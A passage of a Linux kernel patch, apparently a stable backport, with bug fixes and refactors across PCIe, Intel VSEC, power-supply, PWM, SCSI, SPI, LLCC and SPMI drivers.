+-		num * PCIE_ATR_TLB_SET_OFFSET;
++		table = pcie->base + PCIE_TRANS_TABLE_BASE_REG + *num * PCIE_ATR_TLB_SET_OFFSET;
++		writel_relaxed(lower_32_bits(cpu_addr) | PCIE_ATR_SIZE(fls(table_size) - 1), table);
++		writel_relaxed(upper_32_bits(cpu_addr), table + PCIE_ATR_SRC_ADDR_MSB_OFFSET);
++		writel_relaxed(lower_32_bits(pci_addr), table + PCIE_ATR_TRSL_ADDR_LSB_OFFSET);
++		writel_relaxed(upper_32_bits(pci_addr), table + PCIE_ATR_TRSL_ADDR_MSB_OFFSET);
+ 
+-	writel_relaxed(lower_32_bits(cpu_addr) | PCIE_ATR_SIZE(fls(size) - 1),
+-		       table);
+-	writel_relaxed(upper_32_bits(cpu_addr),
+-		       table + PCIE_ATR_SRC_ADDR_MSB_OFFSET);
+-	writel_relaxed(lower_32_bits(pci_addr),
+-		       table + PCIE_ATR_TRSL_ADDR_LSB_OFFSET);
+-	writel_relaxed(upper_32_bits(pci_addr),
+-		       table + PCIE_ATR_TRSL_ADDR_MSB_OFFSET);
++		if (type == IORESOURCE_IO) {
++			val = PCIE_ATR_TYPE_IO | PCIE_ATR_TLP_TYPE_IO;
++			range_type = "IO";
++		} else {
++			val = PCIE_ATR_TYPE_MEM | PCIE_ATR_TLP_TYPE_MEM;
++			range_type = "MEM";
++		}
+ 
+-	if (type == IORESOURCE_IO)
+-		val = PCIE_ATR_TYPE_IO | PCIE_ATR_TLP_TYPE_IO;
+-	else
+-		val = PCIE_ATR_TYPE_MEM | PCIE_ATR_TLP_TYPE_MEM;
++		writel_relaxed(val, table + PCIE_ATR_TRSL_PARAM_OFFSET);
+ 
+-	writel_relaxed(val, table + PCIE_ATR_TRSL_PARAM_OFFSET);
++		dev_dbg(pcie->dev, "set %s trans window[%d]: cpu_addr = %#llx, pci_addr = %#llx, size = %#llx\n",
++			range_type, *num, (unsigned long long)cpu_addr,
++			(unsigned long long)pci_addr, (unsigned long long)table_size);
++
++		cpu_addr += table_size;
++		pci_addr += table_size;
++		remaining -= table_size;
++		(*num)++;
++	}
++
++	if (remaining)
++		dev_warn(pcie->dev, "not enough translate table for addr: %#llx, limited to [%d]\n",
++			 (unsigned long long)cpu_addr, PCIE_MAX_TRANS_TABLES);
+ 
+ 	return 0;
+ }
+@@ -380,30 +405,20 @@ static int mtk_pcie_startup_port(struct mtk_gen3_pcie *pcie)
+ 		resource_size_t cpu_addr;
+ 		resource_size_t pci_addr;
+ 		resource_size_t size;
+-		const char *range_type;
+ 
+-		if (type == IORESOURCE_IO) {
++		if (type == IORESOURCE_IO)
+ 			cpu_addr = pci_pio_to_address(res->start);
+-			range_type = "IO";
+-		} else if (type == IORESOURCE_MEM) {
++		else if (type == IORESOURCE_MEM)
+ 			cpu_addr = res->start;
+-			range_type = "MEM";
+-		} else {
++		else
+ 			continue;
+-		}
+ 
+ 		pci_addr = res->start - entry->offset;
+ 		size = resource_size(res);
+ 		err = mtk_pcie_set_trans_table(pcie, cpu_addr, pci_addr, size,
+-					       type, table_index);
++					       type, &table_index);
+ 		if (err)
+ 			return err;
+-
+-		dev_dbg(pcie->dev, "set %s trans window[%d]: cpu_addr = %#llx, pci_addr = %#llx, size = %#llx\n",
+-			range_type, table_index, (unsigned long long)cpu_addr,
+-			(unsigned long long)pci_addr, (unsigned long long)size);
+-
+-		table_index++;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/pci/controller/pcie-mediatek.c b/drivers/pci/controller/pcie-mediatek.c
+index ae5ad05ddc1d4..11bdef206d120 100644
+--- a/drivers/pci/controller/pcie-mediatek.c
++++ b/drivers/pci/controller/pcie-mediatek.c
+@@ -617,12 +617,18 @@ static void mtk_pcie_intr_handler(struct irq_desc *desc)
+ 		if (status & MSI_STATUS){
+ 			unsigned long imsi_status;
+ 
++			/*
++			 * The interrupt status can be cleared even if the
++			 * MSI status remains pending. As such, given the
++			 * edge-triggered interrupt type, its status should
++			 * be cleared before being dispatched to the
++			 * handler of the underlying device.
++			 */
++			writel(MSI_STATUS, port->base + PCIE_INT_STATUS);
+ 			while ((imsi_status = readl(port->base + PCIE_IMSI_STATUS))) {
+ 				for_each_set_bit(bit, &imsi_status, MTK_MSI_IRQS_NUM)
+ 					generic_handle_domain_irq(port->inner_domain, bit);
+ 			}
+-			/* Clear MSI interrupt status */
+-			writel(MSI_STATUS, port->base + PCIE_INT_STATUS);
+ 		}
+ 	}
+ 
+diff --git a/drivers/platform/x86/intel/vsec.c b/drivers/platform/x86/intel/vsec.c
+index 483bb65651665..40477d1d41b59 100644
+--- a/drivers/platform/x86/intel/vsec.c
++++ b/drivers/platform/x86/intel/vsec.c
+@@ -124,36 +124,60 @@ static void intel_vsec_remove_aux(void *data)
+ 	auxiliary_device_uninit(data);
+ }
+ 
++static DEFINE_MUTEX(vsec_ida_lock);
++
+ static void intel_vsec_dev_release(struct device *dev)
+ {
+ 	struct intel_vsec_device *intel_vsec_dev = dev_to_ivdev(dev);
+ 
++	xa_erase(&auxdev_array, intel_vsec_dev->id);
++
++	mutex_lock(&vsec_ida_lock);
+ 	ida_free(intel_vsec_dev->ida, intel_vsec_dev->auxdev.id);
++	mutex_unlock(&vsec_ida_lock);
++
+ 	kfree(intel_vsec_dev->resource);
+ 	kfree(intel_vsec_dev);
+ }
+ 
+-static int intel_vsec_add_aux(struct pci_dev *pdev, struct intel_vsec_device *intel_vsec_dev,
+-			      const char *name)
++int intel_vsec_add_aux(struct pci_dev *pdev, struct device *parent,
++		       struct intel_vsec_device *intel_vsec_dev,
++		       const char *name)
+ {
+ 	struct auxiliary_device *auxdev = &intel_vsec_dev->auxdev;
+ 	int ret, id;
+ 
+-	ret = ida_alloc(intel_vsec_dev->ida, GFP_KERNEL);
++	ret = xa_alloc(&auxdev_array, &intel_vsec_dev->id, intel_vsec_dev,
++		       PMT_XA_LIMIT, GFP_KERNEL);
+ 	if (ret < 0) {
+ 		kfree(intel_vsec_dev->resource);
+ 		kfree(intel_vsec_dev);
+ 		return ret;
+ 	}
+ 
+-	auxdev->id = ret;
++	mutex_lock(&vsec_ida_lock);
++	id = ida_alloc(intel_vsec_dev->ida, GFP_KERNEL);
++	mutex_unlock(&vsec_ida_lock);
++	if (id < 0) {
++		xa_erase(&auxdev_array, intel_vsec_dev->id);
++		kfree(intel_vsec_dev->resource);
++		kfree(intel_vsec_dev);
++		return id;
++	}
++
++	if (!parent)
++		parent = &pdev->dev;
++
++	auxdev->id = id;
+ 	auxdev->name = name;
+-	auxdev->dev.parent = &pdev->dev;
++	auxdev->dev.parent = parent;
+ 	auxdev->dev.release = intel_vsec_dev_release;
+ 
+ 	ret = auxiliary_device_init(auxdev);
+ 	if (ret < 0) {
++		mutex_lock(&vsec_ida_lock);
+ 		ida_free(intel_vsec_dev->ida, auxdev->id);
++		mutex_unlock(&vsec_ida_lock);
+ 		kfree(intel_vsec_dev->resource);
+ 		kfree(intel_vsec_dev);
+ 		return ret;
+@@ -165,19 +189,14 @@ static int intel_vsec_add_aux(struct pci_dev *pdev, struct intel_vsec_device *in
+ 		return ret;
+ 	}
+ 
+-	ret = devm_add_action_or_reset(&pdev->dev, intel_vsec_remove_aux,
++	ret = devm_add_action_or_reset(parent, intel_vsec_remove_aux,
+ 				       auxdev);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	/* Add auxdev to list */
+-	ret = xa_alloc(&auxdev_array, &id, intel_vsec_dev, PMT_XA_LIMIT,
+-		       GFP_KERNEL);
+-	if (ret)
+-		return ret;
+-
+ 	return 0;
+ }
++EXPORT_SYMBOL_NS_GPL(intel_vsec_add_aux, INTEL_VSEC);
+ 
+ static int intel_vsec_add_dev(struct pci_dev *pdev, struct intel_vsec_header *header,
+ 			      struct intel_vsec_platform_info *info)
+@@ -235,7 +254,8 @@ static int intel_vsec_add_dev(struct pci_dev *pdev, struct intel_vsec_header *he
+ 	else
+ 		intel_vsec_dev->ida = &intel_vsec_ida;
+ 
+-	return intel_vsec_add_aux(pdev, intel_vsec_dev, intel_vsec_name(header->id));
++	return intel_vsec_add_aux(pdev, NULL, intel_vsec_dev,
++				  intel_vsec_name(header->id));
+ }
+ 
+ static bool intel_vsec_walk_header(struct pci_dev *pdev,
+diff --git a/drivers/platform/x86/intel/vsec.h b/drivers/platform/x86/intel/vsec.h
+index 3deeb05cf394d..330672588868d 100644
+--- a/drivers/platform/x86/intel/vsec.h
++++ b/drivers/platform/x86/intel/vsec.h
+@@ -38,8 +38,15 @@ struct intel_vsec_device {
+ 	struct ida *ida;
+ 	struct intel_vsec_platform_info *info;
+ 	int num_resources;
++	int id; /* xa */
++	void *priv_data;
++	size_t priv_data_size;
+ };
+ 
++int intel_vsec_add_aux(struct pci_dev *pdev, struct device *parent,
++		       struct intel_vsec_device *intel_vsec_dev,
++		       const char *name);
++
+ static inline struct intel_vsec_device *dev_to_ivdev(struct device *dev)
+ {
+ 	return container_of(dev, struct intel_vsec_device, auxdev.dev);
+diff --git a/drivers/power/supply/bq256xx_charger.c b/drivers/power/supply/bq256xx_charger.c
+index 01ad84fd147c8..686eb8d86e221 100644
+--- a/drivers/power/supply/bq256xx_charger.c
++++ b/drivers/power/supply/bq256xx_charger.c
+@@ -1514,13 +1514,16 @@ static int bq256xx_hw_init(struct bq256xx_device *bq)
+ 			wd_reg_val = i;
+ 			break;
+ 		}
+-		if (bq->watchdog_timer > bq256xx_watchdog_time[i] &&
++		if (i + 1 < BQ256XX_NUM_WD_VAL &&
++		    bq->watchdog_timer > bq256xx_watchdog_time[i] &&
+ 		    bq->watchdog_timer < bq256xx_watchdog_time[i + 1])
+ 			wd_reg_val = i;
+ 	}
+ 	ret = regmap_update_bits(bq->regmap, BQ256XX_CHARGER_CONTROL_1,
+ 				 BQ256XX_WATCHDOG_MASK, wd_reg_val <<
+ 						BQ256XX_WDT_BIT_SHIFT);
++	if (ret)
++		return ret;
+ 
+ 	ret = power_supply_get_battery_info(bq->charger, &bat_info);
+ 	if (ret == -ENOMEM)
+diff --git a/drivers/power/supply/cw2015_battery.c b/drivers/power/supply/cw2015_battery.c
+index 473522b4326ad..9d957cf8edf07 100644
+--- a/drivers/power/supply/cw2015_battery.c
++++ b/drivers/power/supply/cw2015_battery.c
+@@ -491,7 +491,7 @@ static int cw_battery_get_property(struct power_supply *psy,
+ 
+ 	case POWER_SUPPLY_PROP_TIME_TO_EMPTY_NOW:
+ 		if (cw_battery_valid_time_to_empty(cw_bat))
+-			val->intval = cw_bat->time_to_empty;
++			val->intval = cw_bat->time_to_empty * 60;
+ 		else
+ 			val->intval = 0;
+ 		break;
+diff --git a/drivers/pwm/core.c b/drivers/pwm/core.c
+index d333e7422f4a9..9726f96bf7635 100644
+--- a/drivers/pwm/core.c
++++ b/drivers/pwm/core.c
+@@ -171,7 +171,7 @@ of_pwm_single_xlate(struct pwm_chip *pc, const struct of_phandle_args *args)
+ 	pwm->args.period = args->args[0];
+ 	pwm->args.polarity = PWM_POLARITY_NORMAL;
+ 
+-	if (args->args_count == 2 && args->args[2] & PWM_POLARITY_INVERTED)
++	if (args->args_count == 2 && args->args[1] & PWM_POLARITY_INVERTED)
+ 		pwm->args.polarity = PWM_POLARITY_INVERSED;
+ 
+ 	return pwm;
+diff --git a/drivers/pwm/pwm-jz4740.c b/drivers/pwm/pwm-jz4740.c
+index a5fdf97c0d2ec..246499128142c 100644
+--- a/drivers/pwm/pwm-jz4740.c
++++ b/drivers/pwm/pwm-jz4740.c
+@@ -60,9 +60,10 @@ static int jz4740_pwm_request(struct pwm_chip *chip, struct pwm_device *pwm)
+ 	snprintf(name, sizeof(name), "timer%u", pwm->hwpwm);
+ 
+ 	clk = clk_get(chip->dev, name);
+-	if (IS_ERR(clk))
+-		return dev_err_probe(chip->dev, PTR_ERR(clk),
+-				     "Failed to get clock\n");
++	if (IS_ERR(clk)) {
++		dev_err(chip->dev, "error %pe: Failed to get clock\n", clk);
++		return PTR_ERR(clk);
++	}
+ 
+ 	err = clk_prepare_enable(clk);
+ 	if (err < 0) {
+diff --git a/drivers/pwm/pwm-stm32.c b/drivers/pwm/pwm-stm32.c
+index 794ca5b029681..bdcdb7f38312b 100644
+--- a/drivers/pwm/pwm-stm32.c
++++ b/drivers/pwm/pwm-stm32.c
+@@ -115,14 +115,14 @@ static int stm32_pwm_raw_capture(struct stm32_pwm *priv, struct pwm_device *pwm,
+ 	int ret;
+ 
+ 	/* Ensure registers have been updated, enable counter and capture */
+-	regmap_update_bits(priv->regmap, TIM_EGR, TIM_EGR_UG, TIM_EGR_UG);
+-	regmap_update_bits(priv->regmap, TIM_CR1, TIM_CR1_CEN, TIM_CR1_CEN);
++	regmap_set_bits(priv->regmap, TIM_EGR, TIM_EGR_UG);
++	regmap_set_bits(priv->regmap, TIM_CR1, TIM_CR1_CEN);
+ 
+ 	/* Use cc1 or cc3 DMA resp for PWM input channels 1 & 2 or 3 & 4 */
+ 	dma_id = pwm->hwpwm < 2 ? STM32_TIMERS_DMA_CH1 : STM32_TIMERS_DMA_CH3;
+ 	ccen = pwm->hwpwm < 2 ? TIM_CCER_CC12E : TIM_CCER_CC34E;
+ 	ccr = pwm->hwpwm < 2 ? TIM_CCR1 : TIM_CCR3;
+-	regmap_update_bits(priv->regmap, TIM_CCER, ccen, ccen);
++	regmap_set_bits(priv->regmap, TIM_CCER, ccen);
+ 
+ 	/*
+ 	 * Timer DMA burst mode. Request 2 registers, 2 bursts, to get both
+@@ -160,8 +160,8 @@ static int stm32_pwm_raw_capture(struct stm32_pwm *priv, struct pwm_device *pwm,
+ 	}
+ 
+ stop:
+-	regmap_update_bits(priv->regmap, TIM_CCER, ccen, 0);
+-	regmap_update_bits(priv->regmap, TIM_CR1, TIM_CR1_CEN, 0);
++	regmap_clear_bits(priv->regmap, TIM_CCER, ccen);
++	regmap_clear_bits(priv->regmap, TIM_CR1, TIM_CR1_CEN);
+ 
+ 	return ret;
+ }
+@@ -359,7 +359,7 @@ static int stm32_pwm_config(struct stm32_pwm *priv, int ch,
+ 
+ 	regmap_write(priv->regmap, TIM_PSC, prescaler);
+ 	regmap_write(priv->regmap, TIM_ARR, prd - 1);
+-	regmap_update_bits(priv->regmap, TIM_CR1, TIM_CR1_ARPE, TIM_CR1_ARPE);
++	regmap_set_bits(priv->regmap, TIM_CR1, TIM_CR1_ARPE);
+ 
+ 	/* Calculate the duty cycles */
+ 	dty = prd * duty_ns;
+@@ -377,7 +377,7 @@ static int stm32_pwm_config(struct stm32_pwm *priv, int ch,
+ 	else
+ 		regmap_update_bits(priv->regmap, TIM_CCMR2, mask, ccmr);
+ 
+-	regmap_update_bits(priv->regmap, TIM_BDTR, TIM_BDTR_MOE, TIM_BDTR_MOE);
++	regmap_set_bits(priv->regmap, TIM_BDTR, TIM_BDTR_MOE);
+ 
+ 	return 0;
+ }
+@@ -411,13 +411,13 @@ static int stm32_pwm_enable(struct stm32_pwm *priv, int ch)
+ 	if (priv->have_complementary_output)
+ 		mask |= TIM_CCER_CC1NE << (ch * 4);
+ 
+-	regmap_update_bits(priv->regmap, TIM_CCER, mask, mask);
++	regmap_set_bits(priv->regmap, TIM_CCER, mask);
+ 
+ 	/* Make sure that registers are updated */
+-	regmap_update_bits(priv->regmap, TIM_EGR, TIM_EGR_UG, TIM_EGR_UG);
++	regmap_set_bits(priv->regmap, TIM_EGR, TIM_EGR_UG);
+ 
+ 	/* Enable controller */
+-	regmap_update_bits(priv->regmap, TIM_CR1, TIM_CR1_CEN, TIM_CR1_CEN);
++	regmap_set_bits(priv->regmap, TIM_CR1, TIM_CR1_CEN);
+ 
+ 	return 0;
+ }
+@@ -431,11 +431,11 @@ static void stm32_pwm_disable(struct stm32_pwm *priv, int ch)
+ 	if (priv->have_complementary_output)
+ 		mask |= TIM_CCER_CC1NE << (ch * 4);
+ 
+-	regmap_update_bits(priv->regmap, TIM_CCER, mask, 0);
++	regmap_clear_bits(priv->regmap, TIM_CCER, mask);
+ 
+ 	/* When all channels are disabled, we can disable the controller */
+ 	if (!active_channels(priv))
+-		regmap_update_bits(priv->regmap, TIM_CR1, TIM_CR1_CEN, 0);
++		regmap_clear_bits(priv->regmap, TIM_CR1, TIM_CR1_CEN);
+ 
+ 	clk_disable(priv->clk);
+ }
+@@ -568,41 +568,30 @@ static void stm32_pwm_detect_complementary(struct stm32_pwm *priv)
+ 	 * If complementary bit doesn't exist writing 1 will have no
+ 	 * effect so we can detect it.
+ 	 */
+-	regmap_update_bits(priv->regmap,
+-			   TIM_CCER, TIM_CCER_CC1NE, TIM_CCER_CC1NE);
++	regmap_set_bits(priv->regmap, TIM_CCER, TIM_CCER_CC1NE);
+ 	regmap_read(priv->regmap, TIM_CCER, &ccer);
+-	regmap_update_bits(priv->regmap, TIM_CCER, TIM_CCER_CC1NE, 0);
++	regmap_clear_bits(priv->regmap, TIM_CCER, TIM_CCER_CC1NE);
+ 
+ 	priv->have_complementary_output = (ccer != 0);
+ }
+ 
+-static int stm32_pwm_detect_channels(struct stm32_pwm *priv)
++static unsigned int stm32_pwm_detect_channels(struct stm32_pwm *priv,
++					      unsigned int *num_enabled)
+ {
+-	u32 ccer;
+-	int npwm = 0;
++	u32 ccer, ccer_backup;
+ 
+ 	/*
+ 	 * If channels enable bits don't exist writing 1 will have no
+ 	 * effect so we can detect and count them.
+ 	 */
+-	regmap_update_bits(priv->regmap,
+-			   TIM_CCER, TIM_CCER_CCXE, TIM_CCER_CCXE);
++	regmap_read(priv->regmap, TIM_CCER, &ccer_backup);
++	regmap_set_bits(priv->regmap, TIM_CCER, TIM_CCER_CCXE);
+ 	regmap_read(priv->regmap, TIM_CCER, &ccer);
+-	regmap_update_bits(priv->regmap, TIM_CCER, TIM_CCER_CCXE, 0);
+-
+-	if (ccer & TIM_CCER_CC1E)
+-		npwm++;
++	regmap_write(priv->regmap, TIM_CCER, ccer_backup);
+ 
+-	if (ccer & TIM_CCER_CC2E)
+-		npwm++;
++	*num_enabled = hweight32(ccer_backup & TIM_CCER_CCXE);
+ 
+-	if (ccer & TIM_CCER_CC3E)
+-		npwm++;
+-
+-	if (ccer & TIM_CCER_CC4E)
+-		npwm++;
+-
+-	return npwm;
++	return hweight32(ccer & TIM_CCER_CCXE);
+ }
+ 
+ static int stm32_pwm_probe(struct platform_device *pdev)
+@@ -611,6 +600,8 @@ static int stm32_pwm_probe(struct platform_device *pdev)
+ 	struct device_node *np = dev->of_node;
+ 	struct stm32_timers *ddata = dev_get_drvdata(pdev->dev.parent);
+ 	struct stm32_pwm *priv;
++	unsigned int num_enabled;
++	unsigned int i;
+ 	int ret;
+ 
+ 	priv = devm_kzalloc(dev, sizeof(*priv), GFP_KERNEL);
+@@ -633,7 +624,11 @@ static int stm32_pwm_probe(struct platform_device *pdev)
+ 
+ 	priv->chip.dev = dev;
+ 	priv->chip.ops = &stm32pwm_ops;
+-	priv->chip.npwm = stm32_pwm_detect_channels(priv);
++	priv->chip.npwm = stm32_pwm_detect_channels(priv, &num_enabled);
++
++	/* Initialize clock refcount to number of enabled PWM channels. */
++	for (i = 0; i < num_enabled; i++)
++		clk_enable(priv->clk);
+ 
+ 	ret = pwmchip_add(&priv->chip);
+ 	if (ret < 0)
+diff --git a/drivers/scsi/fnic/fnic_debugfs.c b/drivers/scsi/fnic/fnic_debugfs.c
+index 6fedc3b7d1ab2..eb895a65ea8fc 100644
+--- a/drivers/scsi/fnic/fnic_debugfs.c
++++ b/drivers/scsi/fnic/fnic_debugfs.c
+@@ -52,9 +52,10 @@ int fnic_debugfs_init(void)
+ 		fc_trc_flag->fnic_trace = 2;
+ 		fc_trc_flag->fc_trace = 3;
+ 		fc_trc_flag->fc_clear = 4;
++		return 0;
+ 	}
+ 
+-	return 0;
++	return -ENOMEM;
+ }
+ 
+ /*
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_main.c b/drivers/scsi/hisi_sas/hisi_sas_main.c
+index a8142e2b96435..450a8578157cb 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_main.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_main.c
+@@ -1502,12 +1502,12 @@ EXPORT_SYMBOL_GPL(hisi_sas_controller_reset_done);
+ static int hisi_sas_controller_prereset(struct hisi_hba *hisi_hba)
+ {
+ 	if (!hisi_hba->hw->soft_reset)
+-		return -1;
++		return -ENOENT;
+ 
+ 	down(&hisi_hba->sem);
+ 	if (test_and_set_bit(HISI_SAS_RESETTING_BIT, &hisi_hba->flags)) {
+ 		up(&hisi_hba->sem);
+-		return -1;
++		return -EPERM;
+ 	}
+ 
+ 	if (hisi_sas_debugfs_enable && hisi_hba->debugfs_itct[0].itct)
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+index c4305ec38ebf3..0c80ff9affa39 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+@@ -3330,7 +3330,7 @@ static void debugfs_snapshot_global_reg_v3_hw(struct hisi_hba *hisi_hba)
+ 	u32 *databuf = hisi_hba->debugfs_regs[dump_index][DEBUGFS_GLOBAL].data;
+ 	int i;
+ 
+-	for (i = 0; i < debugfs_axi_reg.count; i++, databuf++)
++	for (i = 0; i < debugfs_global_reg.count; i++, databuf++)
+ 		*databuf = hisi_sas_read32(hisi_hba, 4 * i);
+ }
+ 
+@@ -4946,6 +4946,7 @@ static void hisi_sas_reset_done_v3_hw(struct pci_dev *pdev)
+ {
+ 	struct sas_ha_struct *sha = pci_get_drvdata(pdev);
+ 	struct hisi_hba *hisi_hba = sha->lldd_ha;
++	struct Scsi_Host *shost = hisi_hba->shost;
+ 	struct device *dev = hisi_hba->dev;
+ 	int rc;
+ 
+@@ -4954,6 +4955,10 @@ static void hisi_sas_reset_done_v3_hw(struct pci_dev *pdev)
+ 	rc = hw_init_v3_hw(hisi_hba);
+ 	if (rc) {
+ 		dev_err(dev, "FLR: hw init failed rc=%d\n", rc);
++		clear_bit(HISI_SAS_REJECT_CMD_BIT, &hisi_hba->flags);
++		scsi_unblock_requests(shost);
++		clear_bit(HISI_SAS_RESETTING_BIT, &hisi_hba->flags);
++		up(&hisi_hba->sem);
+ 		return;
+ 	}
+ 
+@@ -4981,7 +4986,7 @@ static int _suspend_v3_hw(struct device *device)
+ 	}
+ 
+ 	if (test_and_set_bit(HISI_SAS_RESETTING_BIT, &hisi_hba->flags))
+-		return -1;
++		return -EPERM;
+ 
+ 	dev_warn(dev, "entering suspend state\n");
+ 
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_app.c b/drivers/scsi/mpi3mr/mpi3mr_app.c
+index d10c6afb7f9cd..8c662d08706f1 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_app.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_app.c
+@@ -223,6 +223,22 @@ static long mpi3mr_bsg_pel_enable(struct mpi3mr_ioc *mrioc,
+ 		return rval;
+ 	}
+ 
++	if (mrioc->unrecoverable) {
++		dprint_bsg_err(mrioc, "%s: unrecoverable controller\n",
++			       __func__);
++		return -EFAULT;
++	}
++
++	if (mrioc->reset_in_progress) {
++		dprint_bsg_err(mrioc, "%s: reset in progress\n", __func__);
++		return -EAGAIN;
++	}
++
++	if (mrioc->stop_bsgs) {
++		dprint_bsg_err(mrioc, "%s: bsgs are blocked\n", __func__);
++		return -EAGAIN;
++	}
++
+ 	sg_copy_to_buffer(job->request_payload.sg_list,
+ 			  job->request_payload.sg_cnt,
+ 			  &pel_enable, sizeof(pel_enable));
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_os.c b/drivers/scsi/mpi3mr/mpi3mr_os.c
+index 6d55698ea4d16..85f5b349c7e43 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_os.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_os.c
+@@ -1044,8 +1044,14 @@ void mpi3mr_rfresh_tgtdevs(struct mpi3mr_ioc *mrioc)
+ 	tgtdev = NULL;
+ 	list_for_each_entry(tgtdev, &mrioc->tgtdev_list, list) {
+ 		if ((tgtdev->dev_handle != MPI3MR_INVALID_DEV_HANDLE) &&
+-		    !tgtdev->is_hidden && !tgtdev->host_exposed)
+-			mpi3mr_report_tgtdev_to_host(mrioc, tgtdev->perst_id);
++		    !tgtdev->is_hidden) {
++			if (!tgtdev->host_exposed)
++				mpi3mr_report_tgtdev_to_host(mrioc,
++							     tgtdev->perst_id);
++			else if (tgtdev->starget)
++				starget_for_each_device(tgtdev->starget,
++							(void *)tgtdev, mpi3mr_update_sdev);
++	}
+ 	}
+ }
+ 
+diff --git a/drivers/soc/qcom/llcc-qcom.c b/drivers/soc/qcom/llcc-qcom.c
+index bc400669ee022..16a05143d0d62 100644
+--- a/drivers/soc/qcom/llcc-qcom.c
++++ b/drivers/soc/qcom/llcc-qcom.c
+@@ -680,14 +680,14 @@ static int _qcom_llcc_cfg_program(const struct llcc_slice_config *config,
+ 		u32 disable_cap_alloc, retain_pc;
+ 
+ 		disable_cap_alloc = config->dis_cap_alloc << config->slice_id;
+-		ret = regmap_write(drv_data->bcast_regmap,
+-				LLCC_TRP_SCID_DIS_CAP_ALLOC, disable_cap_alloc);
++		ret = regmap_update_bits(drv_data->bcast_regmap, LLCC_TRP_SCID_DIS_CAP_ALLOC,
++					 BIT(config->slice_id), disable_cap_alloc);
+ 		if (ret)
+ 			return ret;
+ 
+ 		retain_pc = config->retain_on_pc << config->slice_id;
+-		ret = regmap_write(drv_data->bcast_regmap,
+-				LLCC_TRP_PCB_ACT, retain_pc);
++		ret = regmap_update_bits(drv_data->bcast_regmap, LLCC_TRP_PCB_ACT,
++					 BIT(config->slice_id), retain_pc);
+ 		if (ret)
+ 			return ret;
+ 	}
+diff --git a/drivers/spi/Kconfig b/drivers/spi/Kconfig
+index 946e2186d2448..15ea11ebcbe09 100644
+--- a/drivers/spi/Kconfig
++++ b/drivers/spi/Kconfig
+@@ -1101,9 +1101,10 @@ config SPI_ZYNQ_QSPI
+ 
+ config SPI_ZYNQMP_GQSPI
+ 	tristate "Xilinx ZynqMP GQSPI controller"
+-	depends on (SPI_MASTER && HAS_DMA) || COMPILE_TEST
++	depends on (SPI_MEM && HAS_DMA) || COMPILE_TEST
+ 	help
+ 	  Enables Xilinx GQSPI controller driver for Zynq UltraScale+ MPSoC.
++	  This controller only supports SPI memory interface.
+ 
+ config SPI_AMD
+ 	tristate "AMD SPI controller"
+diff --git a/drivers/spi/spi-sh-msiof.c b/drivers/spi/spi-sh-msiof.c
+index 9bca3d076f053..51ceaa4857249 100644
+--- a/drivers/spi/spi-sh-msiof.c
++++ b/drivers/spi/spi-sh-msiof.c
+@@ -30,12 +30,15 @@
+ 
+ #include <asm/unaligned.h>
+ 
++#define SH_MSIOF_FLAG_FIXED_DTDL_200	BIT(0)
++
+ struct sh_msiof_chipdata {
+ 	u32 bits_per_word_mask;
+ 	u16 tx_fifo_size;
+ 	u16 rx_fifo_size;
+ 	u16 ctlr_flags;
+ 	u16 min_div_pow;
++	u32 flags;
+ };
+ 
+ struct sh_msiof_spi_priv {
+@@ -1073,6 +1076,16 @@ static const struct sh_msiof_chipdata rcar_gen3_data = {
+ 	.min_div_pow = 1,
+ };
+ 
++static const struct sh_msiof_chipdata rcar_r8a7795_data = {
++	.bits_per_word_mask = SPI_BPW_MASK(8) | SPI_BPW_MASK(16) |
++			      SPI_BPW_MASK(24) | SPI_BPW_MASK(32),
++	.tx_fifo_size = 64,
++	.rx_fifo_size = 64,
++	.ctlr_flags = SPI_CONTROLLER_MUST_TX,
++	.min_div_pow = 1,
++	.flags = SH_MSIOF_FLAG_FIXED_DTDL_200,
++};
++
+ static const struct of_device_id sh_msiof_match[] = {
+ 	{ .compatible = "renesas,sh-mobile-msiof", .data = &sh_data },
+ 	{ .compatible = "renesas,msiof-r8a7743",   .data = &rcar_gen2_data },
+@@ -1083,6 +1096,7 @@ static const struct of_device_id sh_msiof_match[] = {
+ 	{ .compatible = "renesas,msiof-r8a7793",   .data = &rcar_gen2_data },
+ 	{ .compatible = "renesas,msiof-r8a7794",   .data = &rcar_gen2_data },
+ 	{ .compatible = "renesas,rcar-gen2-msiof", .data = &rcar_gen2_data },
++	{ .compatible = "renesas,msiof-r8a7795",   .data = &rcar_r8a7795_data },
+ 	{ .compatible = "renesas,msiof-r8a7796",   .data = &rcar_gen3_data },
+ 	{ .compatible = "renesas,rcar-gen3-msiof", .data = &rcar_gen3_data },
+ 	{ .compatible = "renesas,rcar-gen4-msiof", .data = &rcar_gen3_data },
+@@ -1280,6 +1294,9 @@ static int sh_msiof_spi_probe(struct platform_device *pdev)
+ 		return -ENXIO;
+ 	}
+ 
++	if (chipdata->flags & SH_MSIOF_FLAG_FIXED_DTDL_200)
++		info->dtdl = 200;
++
+ 	if (info->mode == MSIOF_SPI_SLAVE)
+ 		ctlr = spi_alloc_slave(&pdev->dev,
+ 				       sizeof(struct sh_msiof_spi_priv));
+diff --git a/drivers/spmi/spmi-mtk-pmif.c b/drivers/spmi/spmi-mtk-pmif.c
+index ad511f2c3324e..01e8851e639d5 100644
+--- a/drivers/spmi/spmi-mtk-pmif.c
++++ b/drivers/spmi/spmi-mtk-pmif.c
+@@ -50,6 +50,7 @@ struct pmif {
+ 	struct clk_bulk_data clks[PMIF_MAX_CLKS];
+ 	size_t nclks;
+ 	const struct pmif_data *data;
++	raw_spinlock_t lock;
+ };
+ 
+ static const char * const pmif_clock_names[] = {
+@@ -314,6 +315,7 @@ static int pmif_spmi_read_cmd(struct spmi_controller *ctrl, u8 opc, u8 sid,
+ 	struct ch_reg *inf_reg;
+ 	int ret;
+ 	u32 data, cmd;
++	unsigned long flags;
